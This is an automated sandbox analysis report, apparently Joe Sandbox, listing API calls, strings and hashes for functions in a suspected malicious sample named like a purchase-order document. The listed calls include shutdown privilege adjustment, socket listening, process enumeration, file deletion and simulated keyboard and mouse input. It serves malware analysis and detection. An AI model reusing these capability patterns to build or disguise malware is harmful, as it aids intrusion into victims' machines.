                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                    • String ID:
                                                                                    • API String ID: 1737998785-0
                                                                                    • Opcode ID: 2e7e903bdebf3f315500f55df17264010b5b044bd6b4ed649e38427e4a658f8e
                                                                                    • Instruction ID: 2e681123ae6cfbf8ee5eb1d80282386f79ca5ccaa28f2aec17fe753a22acc445
                                                                                    • Opcode Fuzzy Hash: 2e7e903bdebf3f315500f55df17264010b5b044bd6b4ed649e38427e4a658f8e
                                                                                    • Instruction Fuzzy Hash: 7541BE35606612AFE720DF19E888B99BBE5EF44318F14C49AE4158FB62C775EC81CBD0
                                                                                    APIs
                                                                                      • Part of subcall function 001A16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001A170D
                                                                                      • Part of subcall function 001A16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 001A173A
                                                                                      • Part of subcall function 001A16C3: GetLastError.KERNEL32 ref: 001A174A
                                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 001AE932
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                    • String ID: $ $@$SeShutdownPrivilege
                                                                                    • API String ID: 2234035333-3163812486
                                                                                    • Opcode ID: e6ad180fda822dfe47621d64569b90339bb9f75bcf578710b6e575ad2caca6b9
                                                                                    • Instruction ID: 7d5f24cc18d3cf24a4cac72ab988cabe195133fd25b153d88768e39c808b3433
                                                                                    • Opcode Fuzzy Hash: e6ad180fda822dfe47621d64569b90339bb9f75bcf578710b6e575ad2caca6b9
                                                                                    • Instruction Fuzzy Hash: 6001D67A611311ABEB5426B89C8ABBB729CAB16758F154922F802E21D2D7A05C84C5E4
                                                                                    APIs
                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 001C1276
                                                                                    • WSAGetLastError.WSOCK32 ref: 001C1283
                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 001C12BA
                                                                                    • WSAGetLastError.WSOCK32 ref: 001C12C5
                                                                                    • closesocket.WSOCK32(00000000), ref: 001C12F4
                                                                                    • listen.WSOCK32(00000000,00000005), ref: 001C1303
                                                                                    • WSAGetLastError.WSOCK32 ref: 001C130D
                                                                                    • closesocket.WSOCK32(00000000), ref: 001C133C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                    • String ID:
                                                                                    • API String ID: 540024437-0
                                                                                    • Opcode ID: 3f6a58d3e1d20f38102ad23a6be20ebe58aaeadfec7798f16f17b8e80e710bfa
                                                                                    • Instruction ID: d92cc8cfa6f6d6e16bd2b72ba7efc64be6f0677521fa1c04255536caf4069e4a
                                                                                    • Opcode Fuzzy Hash: 3f6a58d3e1d20f38102ad23a6be20ebe58aaeadfec7798f16f17b8e80e710bfa
                                                                                    • Instruction Fuzzy Hash: 1A416E35601141AFD710DF24C488F29BBE6AF56318F28858DE8568F2A3C771EC81CBE1
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 0017B9D4
                                                                                    • _free.LIBCMT ref: 0017B9F8
                                                                                    • _free.LIBCMT ref: 0017BB7F
                                                                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,001E3700), ref: 0017BB91
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0021121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0017BC09
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00211270,000000FF,?,0000003F,00000000,?), ref: 0017BC36
                                                                                    • _free.LIBCMT ref: 0017BD4B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                    • String ID:
                                                                                    • API String ID: 314583886-0
                                                                                    • Opcode ID: 4343a6f2d91b320eb58ac05cbd318b768275657fb18bd014ca00e97e6b5a46a9
                                                                                    • Instruction ID: d8e50a08684c964bd3aa1b0f7c7bfe28d868566dbcc9fba96314416af102be4c
                                                                                    • Opcode Fuzzy Hash: 4343a6f2d91b320eb58ac05cbd318b768275657fb18bd014ca00e97e6b5a46a9
                                                                                    • Instruction Fuzzy Hash: 59C12971908219AFCB25AF78DC85BAA7BB8EF51310F14C19AE99CD7251EB308E41C750
                                                                                    APIs
                                                                                      • Part of subcall function 00143AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00143A97,?,?,00142E7F,?,?,?,00000000), ref: 00143AC2
                                                                                      • Part of subcall function 001AE199: GetFileAttributesW.KERNEL32(?,001ACF95), ref: 001AE19A
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 001AD420
                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 001AD470
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 001AD481
                                                                                    • FindClose.KERNEL32(00000000), ref: 001AD498
                                                                                    • FindClose.KERNEL32(00000000), ref: 001AD4A1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                    • String ID: \*.*
                                                                                    • API String ID: 2649000838-1173974218
                                                                                    • Opcode ID: 0c4621bc845d0176bd9c57aa882f61f601f7db38507967a7d189c3d3603f61a1
                                                                                    • Instruction ID: f6ab44dc650406ffa4e0fb9360131d7211e4e47f0b97b92457efac5a86242c15
                                                                                    • Opcode Fuzzy Hash: 0c4621bc845d0176bd9c57aa882f61f601f7db38507967a7d189c3d3603f61a1
                                                                                    • Instruction Fuzzy Hash: 343170710093459FC304EF64D8558AF77A8BFA6314F444E1EF4D6935A1EB30AA09C763
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: __floor_pentium4
                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                    • API String ID: 4168288129-2761157908
                                                                                    • Opcode ID: 44b2aba24df5de21a78a234cf013e4b0a3a59c267238b4e76a173c11773f76c9
                                                                                    • Instruction ID: 587800f399d3e97c7064dddcab1d8cf1a1dbd40b6f0cd93bf47d5a76b552fe8d
                                                                                    • Opcode Fuzzy Hash: 44b2aba24df5de21a78a234cf013e4b0a3a59c267238b4e76a173c11773f76c9
                                                                                    • Instruction Fuzzy Hash: BCC21A71E086298FDB29CE28DD407EAB7F5EB49305F1581EAD44DE7241E774AE828F40
                                                                                    APIs
                                                                                    • _wcslen.LIBCMT ref: 001B64DC
                                                                                    • CoInitialize.OLE32(00000000), ref: 001B6639
                                                                                    • CoCreateInstance.OLE32(001DFCF8,00000000,00000001,001DFB68,?), ref: 001B6650
                                                                                    • CoUninitialize.OLE32 ref: 001B68D4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                    • String ID: .lnk
                                                                                    • API String ID: 886957087-24824748
                                                                                    • Opcode ID: aa8bcd23ee8b2c5c2bdce7bfa3367a1edde06bf2595ff970e155208a13ec6304
                                                                                    • Instruction ID: eba0de6e904314fba357371ac1f3a6ca80b1b6e37aa15dd3f962e3003c1fec1d
                                                                                    • Opcode Fuzzy Hash: aa8bcd23ee8b2c5c2bdce7bfa3367a1edde06bf2595ff970e155208a13ec6304
                                                                                    • Instruction Fuzzy Hash: 90D139715083019FC314EF24C881DABB7E9FFA9744F10496DF5958B2A1DB71E909CB92
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32(?,?,00000000), ref: 001C22E8
                                                                                      • Part of subcall function 001BE4EC: GetWindowRect.USER32(?,?), ref: 001BE504
                                                                                    • GetDesktopWindow.USER32 ref: 001C2312
                                                                                    • GetWindowRect.USER32(00000000), ref: 001C2319
                                                                                    • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 001C2355
                                                                                    • GetCursorPos.USER32(?), ref: 001C2381
                                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 001C23DF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                    • String ID:
                                                                                    • API String ID: 2387181109-0
                                                                                    • Opcode ID: fc0e4faa44738ffa557d34a0f54938c7c2d910b8745b07d304008d578674684c
                                                                                    • Instruction ID: a33c9695d29398b64e4dcbe09c29d51b316a266c3045bbdf9f70cd73f7023948
                                                                                    • Opcode Fuzzy Hash: fc0e4faa44738ffa557d34a0f54938c7c2d910b8745b07d304008d578674684c
                                                                                    • Instruction Fuzzy Hash: 3731DC72106346ABC720DF54D808F9BBBA9FB98714F000A1EF88497181DB34EA48CBD2
                                                                                    APIs
                                                                                      • Part of subcall function 00149CB3: _wcslen.LIBCMT ref: 00149CBD
                                                                                    • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 001B9B78
                                                                                    • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 001B9C8B
                                                                                      • Part of subcall function 001B3874: GetInputState.USER32 ref: 001B38CB
                                                                                      • Part of subcall function 001B3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001B3966
                                                                                    • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 001B9BA8
                                                                                    • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 001B9C75
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                    • String ID: *.*
                                                                                    • API String ID: 1972594611-438819550
                                                                                    • Opcode ID: 5af66c9f249196a58eea196058eb0b076b31148585b6271fc1f9660667e7d924
                                                                                    • Instruction ID: d78c28f151339c6dc2429afcab1b6d973d78961cca4642fa97fcd07648fae118
                                                                                    • Opcode Fuzzy Hash: 5af66c9f249196a58eea196058eb0b076b31148585b6271fc1f9660667e7d924
                                                                                    • Instruction Fuzzy Hash: 9041807194120AAFCF14DFA4C989AEEBBB4EF15310F204156F505A71A1EB309E95CFA0
                                                                                    Strings
                                                                                    • ERCP, xrefs: 0014813C
                                                                                    • _______________________________________________________________________________________________________________________________abccccccccdeefghijklmnopqrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstyzzzzzzzzzzzzzzzz{{{{, xrefs: 00185D55
                                                                                    • VUUU, xrefs: 00185DF0
                                                                                    • VUUU, xrefs: 0014843C
                                                                                    • VUUU, xrefs: 001483FA
                                                                                    • VUUU, xrefs: 001483E8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ERCP$VUUU$VUUU$VUUU$VUUU$_______________________________________________________________________________________________________________________________abccccccccdeefghijklmnopqrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstyzzzzzzzzzzzzzzzz{{{{
                                                                                    • API String ID: 0-2009957334
                                                                                    • Opcode ID: ec53f2ae3c28bea9cd28bad2d19a40c54220da0ae65aeffdb00d686f5cf7bcab
                                                                                    • Instruction ID: 92b0f601a77e8414bd6f43fdfb0462bdfe0b7f87a03c407f76e8ad3d3096846a
                                                                                    • Opcode Fuzzy Hash: ec53f2ae3c28bea9cd28bad2d19a40c54220da0ae65aeffdb00d686f5cf7bcab
                                                                                    • Instruction Fuzzy Hash: 36A27071E0061ACBDF24DF58C8507AEB7B2FF54314F2581AAE815AB295DB709E81CF90
                                                                                    APIs
                                                                                      • Part of subcall function 00159BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00159BB2
                                                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 00159A4E
                                                                                    • GetSysColor.USER32(0000000F), ref: 00159B23
                                                                                    • SetBkColor.GDI32(?,00000000), ref: 00159B36
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$LongProcWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3131106179-0
                                                                                    • Opcode ID: 13c695ce5b28d92faade3b908edac03832463c2b4c9c0757ca769d781ddfe7d2
                                                                                    • Instruction ID: c5fa91400d9d11c65f5f0aa0fea77c718e83bcb629c90a60bfa2ede97f53faa2
                                                                                    • Opcode Fuzzy Hash: 13c695ce5b28d92faade3b908edac03832463c2b4c9c0757ca769d781ddfe7d2
                                                                                    • Instruction Fuzzy Hash: C9A108B0218544EEEB2DAA3C9C4CDBB365DDF52342B16420AF922CF6D5CB259D05C273
                                                                                    APIs
                                                                                      • Part of subcall function 001C304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 001C307A
                                                                                      • Part of subcall function 001C304E: _wcslen.LIBCMT ref: 001C309B
                                                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 001C185D
                                                                                    • WSAGetLastError.WSOCK32 ref: 001C1884
                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 001C18DB
                                                                                    • WSAGetLastError.WSOCK32 ref: 001C18E6
                                                                                    • closesocket.WSOCK32(00000000), ref: 001C1915
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                    • String ID:
                                                                                    • API String ID: 1601658205-0
                                                                                    • Opcode ID: 7872cff18f1321441e9869aeb681bde09acd3048cb7e3e298cc4a687929dcfe9
                                                                                    • Instruction ID: 11b77ddfcf9cb760a82d5a948cff3556da003358e995e3a9a504b4f459c63e8f
                                                                                    • Opcode Fuzzy Hash: 7872cff18f1321441e9869aeb681bde09acd3048cb7e3e298cc4a687929dcfe9
                                                                                    • Instruction Fuzzy Hash: 5D519F71A40210AFDB10AF64C886F2AB7A5AB59718F18849CF9169F3D3C771ED41CBE1
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                    • String ID:
                                                                                    • API String ID: 292994002-0
                                                                                    • Opcode ID: 45a54a9620647ffab8c9e865363613057b0a3988825d97cd232e07d4b56dee04
                                                                                    • Instruction ID: 6e39fb0c558197d015062c6ba3d7c60425abdc8ea1c5da5a93eb06bffaba5df4
                                                                                    • Opcode Fuzzy Hash: 45a54a9620647ffab8c9e865363613057b0a3988825d97cd232e07d4b56dee04
                                                                                    • Instruction Fuzzy Hash: 7A2102317522017FD7208F2AC884B2A7BE5EF94320F19806AE84ACB351CB71EC42CBD0
                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 001A82AA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrlen
                                                                                    • String ID: ($tb $|
                                                                                    • API String ID: 1659193697-4033350771
                                                                                    • Opcode ID: 587dff18cf6dedeeacc27b883f87f82cdf8f5e62507732aaea640dc464e71815
                                                                                    • Instruction ID: d66500697d6623988cc6ac2edcbfc6b6f99b2d976c5ab7bff38acc80e188a862
                                                                                    • Opcode Fuzzy Hash: 587dff18cf6dedeeacc27b883f87f82cdf8f5e62507732aaea640dc464e71815
                                                                                    • Instruction Fuzzy Hash: EB322579A007059FCB28CF59C481A6AB7F0FF48710B15C56EE99ADB3A1EB70E941CB40
                                                                                    APIs
                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 001CA6AC
                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 001CA6BA
                                                                                      • Part of subcall function 00149CB3: _wcslen.LIBCMT ref: 00149CBD
                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 001CA79C
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 001CA7AB
                                                                                      • Part of subcall function 0015CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00183303,?), ref: 0015CE8A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 1991900642-0
                                                                                    • Opcode ID: 963ec8eafee798387c4c1c14f57e935473936328a3c316014d72c531de74a84e
                                                                                    • Instruction ID: 25e0c252b1dcafe970dd62e6c323252e5e04b3bf969d02e2cf2665536df96747
                                                                                    • Opcode Fuzzy Hash: 963ec8eafee798387c4c1c14f57e935473936328a3c316014d72c531de74a84e
                                                                                    • Instruction Fuzzy Hash: 7C516C71508311AFD310EF24D886E6BBBE8FFA9754F40491DF99997262EB30D904CB92
                                                                                    APIs
                                                                                    • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 001AAAAC
                                                                                    • SetKeyboardState.USER32(00000080), ref: 001AAAC8
                                                                                    • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 001AAB36
                                                                                    • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 001AAB88
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
